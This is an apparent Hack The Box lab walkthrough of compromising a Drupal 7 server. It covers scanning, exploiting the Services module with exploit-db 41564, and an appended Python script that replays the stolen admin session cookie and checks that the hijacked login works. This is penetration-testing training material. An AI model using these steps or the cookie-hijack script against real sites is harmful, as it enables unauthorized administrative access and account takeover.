We start, as always, with NMAP

root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-16 09:59 CEST
Nmap scan report for 10.10.10.9
Host is up (0.018s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.94 seconds
From here we can already see interesting things: the login page, CHANGELOG.txt (which is what pins the exact Drupal version), and so on.

Both the scan (http-generator header) and the landing page tell us it is Drupal, so we run droopescan:

root@Kali2:~/Downloads# droopescan scan drupal -u 10.10.10.9
[+] Themes found:
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.9/CHANGELOG.txt
    Default admin - http://10.10.10.9/user/login

[+] Possible version(s):
    7.54

[+] Plugins found:
    ctools http://10.10.10.9/sites/all/modules/ctools/
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/ctools/changelog.txt
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
        http://10.10.10.9/sites/all/modules/ctools/API.txt
    libraries http://10.10.10.9/sites/all/modules/libraries/
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/libraries/changelog.txt
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/libraries/README.txt
        http://10.10.10.9/sites/all/modules/libraries/readme.txt
        http://10.10.10.9/sites/all/modules/libraries/README.TXT
        http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
    services http://10.10.10.9/sites/all/modules/services/
        http://10.10.10.9/sites/all/modules/services/README.txt
        http://10.10.10.9/sites/all/modules/services/readme.txt
        http://10.10.10.9/sites/all/modules/services/README.TXT
        http://10.10.10.9/sites/all/modules/services/LICENSE.txt
    image http://10.10.10.9/modules/image/
    profile http://10.10.10.9/modules/profile/
    php http://10.10.10.9/modules/php/

[+] Scan finished (0:58:57.307825 elapsed)
The Services module is installed (sites/all/modules/services/), so you can use https://www.exploit-db.com/exploits/41564 (Drupal 7 Services module remote code execution) to exploit it, with the endpoint path set to /rest.

Note that the script as published has two errors, on lines 16 and 71, that need fixing first.

If it still does not work after that, it is because php-curl is not installed on your Kali. Try:

root@kali:~/Desktop# apt-get install php-curl
root@kali:~/Desktop# systemctl restart apache2

(The exploit is a PHP script run from the command line, so only the package install matters; the Apache restart is harmless but unnecessary unless you are running PHP through the web server.)
After running it you will have two files, user.json and session.json:

#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries

If you copy the session information into a new cookie in your browser, with the session name as the cookie name and the session id as its value, and refresh the page, you will be admin 🙂
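As an added example (not part of the original writeup nor of exploit 41564), the same cookie step done from a script instead of a browser cookie editor: it reads the two JSON files the exploit writes, refuses anything that does not look like a Drupal 7 session cookie (so a botched run fails loudly instead of yielding a cookie that silently does nothing), checks that user.json really describes an administrator, and requests /user with the cookie to confirm the site now treats you as logged in. The JSON key names (session_name, session_id, uid, roles) are assumed to match what the published script writes; all sample values below are constructed.

```python
import json
import re
import urllib.request

# Constructed sample data shaped like the two files the exploit writes
# (key names assumed from the published script; values are made up).
SESSION_JSON = ('{"session_name": "SESS0123456789abcdef0123456789abcdef", '
                '"session_id": "c0nstructed_s3ssion_id_value"}')
USER_JSON = ('{"uid": "1", "name": "admin", "mail": "admin@example.com", '
             '"roles": {"2": "authenticated user", "3": "administrator"}}')
# Constructed fragment of a Drupal 7 page rendered for a logged-in user.
SAMPLE_HTML = ('<ul class="menu"><li><a href="/user/1">My account</a></li>'
               '<li><a href="/user/logout">Log out</a></li></ul>')

# Drupal 7 names its session cookie SESS + 32 hex chars (SSESS over HTTPS).
SESSION_NAME_RE = re.compile(r"^S?SESS[0-9a-f]{32}$")


def load_session(text):
    """Parse session.json and return (cookie_name, cookie_value).

    Raises ValueError when the file does not hold a Drupal 7 session, e.g.
    when the exploit captured an error page instead of a real login.
    """
    data = json.loads(text)
    name, value = data["session_name"], data["session_id"]
    if not SESSION_NAME_RE.match(name) or not value:
        raise ValueError("session.json does not hold a Drupal 7 session: %r" % data)
    return name, value


def load_user(text):
    """Parse user.json (the Drupal user object returned by the login call)."""
    return json.loads(text)


def cookie_header(session):
    """Value for the Cookie: request header, i.e. <session_name>=<session_id>."""
    name, value = session
    return "%s=%s" % (name, value)


def is_admin(user):
    """True if user.json describes uid 1 or a user holding the administrator role."""
    roles = user.get("roles") or {}
    if isinstance(roles, dict):
        roles = roles.values()
    return str(user.get("uid")) == "1" or "administrator" in [r.lower() for r in roles]


def looks_logged_in(html):
    """Heuristic: a page rendered for an authenticated user carries a /user/logout link."""
    return re.search(r'href="[^"]*/user/logout"', html) is not None


def check_session(base_url, session, timeout=10):
    """GET /user with the stolen cookie and report whether Drupal treats us as logged in.

    /user shows the login form to anonymous visitors and redirects to the
    user's own profile page otherwise; urllib follows that redirect.
    """
    req = urllib.request.Request(base_url.rstrip("/") + "/user",
                                 headers={"Cookie": cookie_header(session)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return looks_logged_in(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    with open("session.json") as f:
        session = load_session(f.read())
    with open("user.json") as f:
        user = load_user(f.read())
    print("cookie:", cookie_header(session), "| admin:", is_admin(user))
    # Target from this writeup; swap in your own base URL.
    print("logged in:", check_session("http://10.10.10.9", session))
```

Run it from the directory where the exploit left session.json and user.json. The printed cookie value is exactly what you would paste into the browser's cookie editor; the last line tells you whether the session is actually accepted before you bother switching to the browser.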
https://redteamtutorials.com/2018/11/07/hack-the-box-bastard/
empire and sherlock